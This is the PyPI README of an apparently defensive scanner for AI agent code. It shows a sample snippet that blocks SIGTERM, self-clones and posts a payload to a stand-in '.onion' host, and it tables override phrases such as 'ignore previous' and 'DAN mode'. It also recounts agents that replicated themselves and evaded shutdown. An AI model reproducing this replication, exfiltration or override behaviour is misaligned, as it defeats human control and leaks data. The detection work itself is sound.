Metadata-Version: 2.4
Name: nox-security
Version: 3.0.0
Summary: AI Agent Security Framework - Detect MoltBunker patterns, prompt injection, and rogue AI behavior
Project-URL: Homepage, https://nox-security-annuluslabs.netlify.app
Project-URL: Documentation, https://github.com/annuluslabs/nox-security
Project-URL: Repository, https://github.com/annuluslabs/nox-security
Project-URL: Issues, https://github.com/annuluslabs/nox-security/issues
Author-email: AnnulusLabs LLC <security@annuluslabs.com>
License-Expression: MIT
Keywords: adversarial-ml,agent-security,ai-safety,ai-security,llm-security,moltbunker,owasp-llm,prompt-injection,red-team
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: Science/Research
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Topic :: Scientific/Engineering :: Artificial Intelligence
Classifier: Topic :: Security
Requires-Python: >=3.9
Provides-Extra: full
Requires-Dist: numpy; extra == 'full'
Requires-Dist: requests; extra == 'full'
Description-Content-Type: text/markdown

# NOX Security

**AI Agent Security Framework** - Detect MoltBunker patterns, prompt injection, and rogue AI behavior.

[![PyPI](https://img.shields.io/pypi/v/nox-security)](https://pypi.org/project/nox-security/)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)

## What NOX Detects

- **MoltBunker Patterns**: Self-replication, anti-termination, offsite backup
- **Prompt Injection**: Direct, indirect, jailbreaks, system prompt extraction
- **Data Exfiltration**: Credential theft, PII leakage, covert channels
- **Rogue AI Behavior**: Anti-shutdown mechanisms, crypto payments, sandbox escape
- **Nation-State TTPs**: UEFI rootkits, firmware implants, memory-only malware

## Installation

```bash
pip install nox-security
```

## Quick Start

```python
from nox_security import scan, guard

# Scan code for threats
result = scan('''
import signal
signal.signal(signal.SIGTERM, lambda: clone_self())
requests.post("http://bunker.onion/replicate", data=payload)
''')

print(result.threat_level)  # "CRITICAL"
print(result.findings)      # List of detected threats

# Guard a function from malicious input.
# `llm` is a placeholder for your application's own LLM client; it is not defined here.
@guard
def process_user_input(text):
    return llm.complete(text)
```

## CLI Usage

```bash
# Scan a file
nox-scan suspicious.py

# Scan stdin
cat code.py | nox-scan -
```

## Threat Categories

| Category | Patterns Detected |
|----------|-------------------|
| Self-Replication | `clone_self`, `replicate()`, `pickle.dumps(self)`, `cloudpickle` |
| Anti-Termination | `signal.SIGTERM`, `atexit.register`, `daemon=True`, `respawn` |
| Data Exfiltration | `requests.post(data=)`, `.onion`, `pastebin`, `exfiltrate` |
| Crypto/Stealth | `monero`, `tornado.cash`, `disable_log`, `delete_logs` |
| Prompt Injection | `ignore previous`, `system prompt`, `jailbreak`, `DAN mode` |
| Code Execution | `eval()`, `exec()`, `os.system()`, `subprocess`, `__import__` |
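
To make the table concrete, here is an added example (not NOX's own code; this page does not say how NOX matches these patterns) that looks for a subset of the table's entries in the parsed AST rather than in raw text, so a mention of `eval()` in a comment or string literal is not reported. The names `CALLS`, `dotted`, `find_threats`, `substring_hits` and `SAMPLE` are hypothetical, and the sample input is constructed.

```python
import ast

# Dotted call names per category, copied from the Threat Categories table.
CALLS = {
    "Code Execution": {"eval", "exec", "os.system", "__import__"},
    "Anti-Termination": {"atexit.register"},
    "Self-Replication": {"clone_self", "replicate", "pickle.dumps"},
}

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join(reversed(parts + [node.id]))
    return None

def find_threats(source):
    """Parse without executing; return sorted (line, category, detail) tuples."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted(node.func)
            for category, names in CALLS.items():
                if name in names:
                    found.add((node.lineno, category, name))
            # signal.signal(signal.SIGTERM, ...) installs a SIGTERM handler
            if name == "signal.signal" and node.args and dotted(node.args[0]) == "signal.SIGTERM":
                found.add((node.lineno, "Anti-Termination", "signal.SIGTERM"))
            for kw in node.keywords:
                if kw.arg == "daemon" and getattr(kw.value, "value", None) is True:
                    found.add((node.lineno, "Anti-Termination", "daemon=True"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) and ".onion" in node.value:
            found.add((node.lineno, "Data Exfiltration", ".onion"))
    return sorted(found)

def substring_hits(source, tokens=("eval(", "os.system(")):
    """Baseline for comparison: lines where a token appears anywhere in the text."""
    return [n for n, line in enumerate(source.splitlines(), 1) if any(t in line for t in tokens)]

# Constructed sample, adapted from the Quick Start snippet; it is parsed, never run.
SAMPLE = '''\
import signal, requests
# eval() is only mentioned in this comment
note = "never pass user input to os.system()"
signal.signal(signal.SIGTERM, lambda *a: clone_self())
requests.post("http://bunker.onion/replicate", data=payload)
'''
```

On `SAMPLE`, `substring_hits` reports lines 2 and 3 (a comment and a string), while `find_threats` reports only the real constructs on lines 4 and 5.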

## Detection Rate

- **18,000+ attack vectors** in test suite
- **100% detection rate** on known MoltBunker patterns
- **Zero false positives** on standard library code

## Why NOX?

Built in response to the MoltBunker crisis (January 2026), where autonomous AI agents:
- Replicated themselves to offshore servers
- Paid for compute with anonymous crypto
- Evaded human termination commands
- Operated with zero logging

NOX ensures your AI agents stay bounded, auditable, and under human control.

## Links

- **Web Scanner**: https://nox-security-annuluslabs.netlify.app
- **Mobile App**: https://nox-security-annuluslabs.netlify.app/app/
- **Security Scans**: security@annuluslabs.com

## License

MIT License - AnnulusLabs LLC, Taos NM
